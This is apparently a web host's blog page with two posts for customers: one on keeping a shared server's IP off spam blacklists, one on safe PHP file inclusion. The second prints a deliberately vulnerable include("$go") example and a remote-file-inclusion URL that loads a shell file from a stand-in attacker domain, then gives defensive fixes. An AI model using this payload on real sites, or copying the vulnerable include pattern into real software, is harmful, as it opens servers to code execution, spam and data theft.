
11

Oct

7

Please Help Us To Help Your Email

On shared hosting servers we have hundreds of domains and thousands of mail users using a single server, and all these domains and users send email out on one IP. Everyone on a server has a joint responsibility to keep their server’s IP off email blacklists! Every week we receive complaints that some server’s IP has been blacklisted by AOL or some other provider. We can easily fix the issue by changing the IP or asking to be whitelisted, but this works only until the next time.

So why do servers send spam and get blacklisted? Back in the old days the big problem was formmail. While these do still present problems, there are two main reasons these days:

1) Email boxes get hacked and mail is sent. This does not mean that a hacker is physically trying to hack into your mailbox, connects via Outlook or Webmail, reads your mail and then sends a million emails. It is all done automatically by spambots that crawl the web. They find a domain and then run a username and password script against it, so if you have a mailbox called “info” with password “123456” then you WILL get hacked. You may never know about it, but a spambot will connect to the server with your credentials and send spam. You might receive some mail failures from messages you didn’t send, which would indicate this might have happened (but you can also get failures from mail made to look as though it came from your domain but wasn’t sent from our server, which is called “spoofing”), or the spambot can simply blackhole the Reply To field so you’d never know this has happened.

SOLUTION: Use a password that does not exist in a dictionary and is at least a combination of letters and numbers. The more complex the characters, the harder it is to hack. If you are a reseller or simply have other people using mail on your domains please tell them to use better passwords.

2) Popular software like WordPress or OSCommerce or any freeware PHP script will always be targeted by spammers because they are so widely used. The programmers that make such software constantly update their code not just to add new features but because a spammer has found a new way to exploit their code and hack a server or mail function. If you use some popular PHP script you absolutely MUST keep it updated. If the software provider releases an update you should upgrade as soon as possible.

Please help us to keep mail flowing!

10

Jun

21

PHP Security and YOU – Including files the right way

As a web host we fight the battle against hackers and bad code on a daily basis. So HostNexus is looking to encourage clients to use file inclusion within PHP in a more security conscious and safe manner.

Including files with PHP is a common practice and most usage comes in 2 forms. These are including internal files from your own domain and including files from remote (external) sources. This looks something like:

Internal:

<?php
   include("http://www.myowndomain.com/something.txt");
?>

External:

<?php
   include("http://www.externaldomain.com/something.txt");
?>

Both are valid syntax in the PHP world but there are two main problems we see on the servers. The first: when you include a file using the URL of your local domain you can cause a PHP loop that initiates endless HTTP requests, which causes server load issues and even a server crash due to the load. If you want to include files from your local domain you just need to use the server path instead:

<?php
   include('/home/httpd/vhosts/myowndomain.com/httpdocs/something.txt');
?>

And now onto using include() for calling external files:

<?php
   include("http://www.externaldomain.com/something.txt");
?>

The main problem with include() is that it runs everything through the PHP parser and evaluates it as code. This becomes dangerous when the argument to include() is a variable that a visitor can set, which is easily exploited. Here is an example of code in an index.php:

<?php
    echo "<html>\n";
    echo "  <body>\n";
    include("$go");
    echo "  </body>\n";
    echo "</html>\n";
?>

The $go variable above is easily exploited with a request like:

http://myowndomain.com/index.php?go=http://www.hackerdomain.com/shell.txt

The hacker can now execute commands on your files, installing phishing sites, sending spam and stealing data.

If you want to include files from remote domains use PHP’s readfile() function instead:

http://www.php.net/manual/en/function.readfile.php

While not 100% secure it still provides more protection as readfile() simply outputs data to a browser rather than parsing everything as PHP.
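For local pages selected by a request parameter, the variable include shown earlier can be replaced with an allowlist. This is an added example, not code from HostNexus; the page names, the pages/ directory and the functions resolve_page() and render() are hypothetical.

```php
<?php
// Added example: hardened replacement for include("$go").
// Page names and the pages/ directory are hypothetical.

// Allowlist: request value => file on local disk. Only these values can
// ever reach include(), so URLs and arbitrary paths are refused.
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
    'news'    => 'news.php',
];

function resolve_page($go, $baseDir)
{
    // Accept exact string keys only; arrays (?go[]=x) and unknown names fail.
    if (!is_string($go) || !array_key_exists($go, PAGES)) {
        return null;
    }
    $path = $baseDir . '/' . PAGES[$go];
    return is_file($path) ? $path : null;
}

function render($go, $baseDir)
{
    $path = resolve_page($go, $baseDir);
    if ($path === null) {
        http_response_code(404);   // must be set before any output
    }
    echo "<html>\n  <body>\n";
    if ($path === null) {
        echo "    <p>Page not found.</p>\n";
    } else {
        include $path;             // always a local server path from the map
    }
    echo "  </body>\n</html>\n";
}

if (PHP_SAPI === 'cli') {
    // Self-check with constructed inputs when run from the command line.
    $dir = sys_get_temp_dir() . '/pages_demo';
    @mkdir($dir);
    file_put_contents($dir . '/home.php', "<p>Home</p>\n");
    var_dump(resolve_page('home', $dir));
    var_dump(resolve_page('http://www.hackerdomain.com/shell.txt', $dir));
    var_dump(resolve_page(['home'], $dir));
} else {
    render(isset($_GET['go']) ? $_GET['go'] : 'home', __DIR__ . '/pages');
}
```

Because the request value is only ever used as an array key, the URL from the example above never reaches include() and the visitor gets the 404 branch instead.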

We’d love to enforce the two practices above but we also understand not everyone is happy modifying code. However, if you know you use includes and have even a simple understanding of these functions then please do revisit your code and help yourself to secure your data and server.

Laurence